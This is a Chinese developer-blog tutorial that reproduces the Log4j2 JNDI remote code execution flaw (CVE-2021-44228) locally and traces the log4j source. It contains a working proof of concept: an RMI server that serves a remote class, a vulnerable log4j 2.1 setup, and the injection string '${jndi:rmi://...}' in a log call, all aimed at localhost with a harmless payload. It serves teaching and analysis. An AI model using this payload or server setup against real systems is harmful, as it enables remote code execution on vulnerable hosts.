Log4j2远程执行代码漏洞本地重现及分析-京东云开发者社区

### 1 时间线
- 2021年11月24日，阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。
- 2021年12月9日，阿里云安全团队发布 Apache Log4j2 远程代码执行漏洞（CVE-2021-44228） 安全通告
- 2021年12月10日，阿里云安全团队发现绕过，更新建议修复版本为 Apache Log4j 2.15.0 及其以上。
- 2021年12月15日，阿里云安全团队更新安全建议，新增 Apache Log4j 2.12.2 安全版本。

其次还有漏洞描述、漏洞评级、影响版本、安全建议等等，详情请看https://help.aliyun.com/noticelist/articleid/1060971232.html

### 2 本地复现
我们本地启用两个项目，看看代码是怎么实现远程侵入的。首先环境准备：这里没有使用tomcat作为web容器启动，而是使用nginx作为服务器发布的本地代码，所以需要nginx，两个java工程（都是main方法启动即可，也不需要springboot）。

#### 2.1 项目一
这个项目就好比黑客本地搭载入侵的服务

##### 2.1.1 pom文件
jdk版本无要求

```xml
    <groupId>com.example</groupId>
    <artifactId>demo</artifactId>
    <version>1.0-SNAPSHOT</version>

<properties>
        <maven.compiler.source>6</maven.compiler.source>
        <maven.compiler.target>6</maven.compiler.target>
    </properties>
```

##### 2.1.2 主方法

```java
import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

/**
 * @author : 
 * @version V1.0
 * @Project: demo
 * @Package PACKAGE_NAME
 * @Description: TODO
 * @date Date : 2021年12月14日 17:24
 */
public class RMIServer {
    public static void main(String[] args)  {

try {
            LocateRegistry.createRegistry(1099);
            Registry registry = LocateRegistry.getRegistry();

System.out.println("Create RMI Server on port 1099");

Reference reference = new Reference("RemoteObj", "RemoteObj", "http://127.0.0.1:80/");
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
            registry.bind("remote", referenceWrapper);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```

##### 2.1.3 实操类
简单模拟，主要是一个静态块，这里实现ObjectFactory接口，主要是为了实现getObjectInstance方法，方法的意义是指定返回的实体，这里返回"**我是远程类**"的字符串。

```java
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;

/**
 * @author : 
 * @version V1.0
 * @Project: demo
 * @Package PACKAGE_NAME
 * @Description: TODO
 * @date Date : 2021年12月14日 16:10
 */
public class RemoteObj implements ObjectFactory{

static {
        System.out.println("嘿嘿，想不到吧");
    }

@Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        return "我是远程类";
    }
}
```

##### 2.1.4 启用服务
到这里项目一的代码就完事了，之后启动main方法。

![](//img1.jcloudcs.com/developer.jdcloud.com/cb89c3ca-d35a-4dcb-8b07-e3ab17e72b4b20211216145709.png)

是不是很简单，但是因为咱们得启动服务，所以需要启动nginx（默认配置），浏览器访问一下127.0.0.1是不是好使。

![](//img1.jcloudcs.com/developer.jdcloud.com/da5c241b-af79-4210-b52a-13f4dc4132b420211216145722.png)

然后把编译后的class放到html中

![](//img1.jcloudcs.com/developer.jdcloud.com/eb812104-0670-48c7-b1da-8c687f72032b20211216145740.png)

#### 2.2 项目二
相对来说项目二就更简单了
##### 2.2.1 pom文件
这里jdk采用1.6版本，log4j-core使用2.1版本

```xml
    <dependencies>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.1</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.1</version>
        </dependency>
    </dependencies>

<build>
        <plugins>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-compiler-plugin</artifactId>
                <version>3.1</version>
                <configuration>
                    <source>1.6</source>
                    <target>1.6</target>
                </configuration>
            </plugin>
        </plugins>
    </build>
```

##### 2.2.2 log4j2.xml
既然测试log4j，肯定也需要配置下xml日志

```xml
<?xml version="1.0" encoding="UTF-8"?>
<Configuration>
    <Appenders>
        <Console name="console" target="SYSTEM_OUT">
            <PatternLayout pattern="%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n"/>
        </Console>
    </Appenders>
    <Loggers>
        <Logger name="com.example" level="INFO"/>
        <Root level="error">
            <AppenderRef ref="console"/>
        </Root>
    </Loggers>
</Configuration>
```

##### 2.2.3 Log4jTest.java

```java
package com.example;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.io.IOException;

public class Log4jTest {
    private static final Logger LOGGER = LogManager.getLogger();
    public static void main(String[] args) throws IOException, NamingException {
/*        Context context = new InitialContext();
        context.lookup("rmi://127.0.0.1:1099/remote");*/

LOGGER.info("Hello, {}", "${jndi:rmi://127.0.0.1:1099/remote}");
    }
}
```

##### 2.2.4 启动

![](//img1.jcloudcs.com/developer.jdcloud.com/0eda63d6-e0bb-4e98-b90b-87aa5d99f33d20211216150037.png)

这段话是我第一个项目的，这就完成了入侵。
### 3 源码跟踪分析

这个漏洞的原因呢，网上的资料一大堆，主要是跟一个JNDI的东西相关，咱们后续再解释这个名词，先追踪下源码，看log4j如何解析jndi:rmi://127.0.0.1:1099/remote 这个字符串的。追踪源码无非是debug，一步步深入下去，这里就不再一一截图了，只挑选几个关键的入口类。

首先是org.apache.logging.log4j.core.config.LoggerConfig#log方法的this.callAppenders(event)，之后的org.apache.logging.log4j.core.config.AppenderControl#callAppender方法，可以看到组装了LogEvent对象，里面有message字段

![](//img1.jcloudcs.com/developer.jdcloud.com/fef8179c-eee5-4c2a-9cdd-f435b3f709ec20211216150115.png)

之后到org.apache.logging.log4j.core.pattern.MessagePatternConverter#format

![](//img1.jcloudcs.com/developer.jdcloud.com/a63e2179-b8db-419c-98d4-f769c02702f020211216150131.png)

再之后 org.apache.logging.log4j.core.lookup.StrSubstitutor#resolveVariable，log里会解析下面这些前缀的地址，咱们这里是jndi

![](//img1.jcloudcs.com/developer.jdcloud.com/abc08674-094c-4d9e-9312-e4c7b7ecf32420211216150147.png)

再然后org.apache.logging.log4j.core.lookup.Interpolator#lookup

![](//img1.jcloudcs.com/developer.jdcloud.com/bedd21a6-9990-41fa-b833-476e95092b0620211216150208.png)

这里最终解析到了远程对象，并且将对象转换成了String

![](//img1.jcloudcs.com/developer.jdcloud.com/f3da7aa4-8788-455f-8348-db5b35b72d4a20211216150222.png)

返回的对象："我是远程类"

![](//img1.jcloudcs.com/developer.jdcloud.com/597268db-fdb2-4856-8ee6-376f618dfd6820211216150242.png)

### 4 JNDI
JNDI，名为Java 命名与目录接口（Java Naming and Directory Interface)，网上的解释很多，我就不复述一遍了，我个人的简单理解：命名服务是将名称和对象联系起来，并通过名称找到对象，类比于spring容器，根据bean的id就可以找到bean类，只不过spring只能在当前容器内查找而已。犹记得第一次在weblogic部署项目的场景，使用的oracle数据库直接在weblogic的页面上配置，历历在目呀。当然了，除了命名目录本身的概念，外延包括命名规范，名称绑定，上下文等。比如spring提供的Application Context，Java Context， 都提供了命名，绑定，通过名称找到对象，列出所有绑定对象的名称这些操作

### 5 参考

1. https://help.aliyun.com/noticelist/articleid/1060971232.html
1. https://docs.oracle.com/javase/tutorial/jndi/concepts/index.html
1. https://www.cnblogs.com/xuehao/p/15684159.html

------------

###### 自猿其说Tech-京东物流技术发展部
###### 作者：曹志星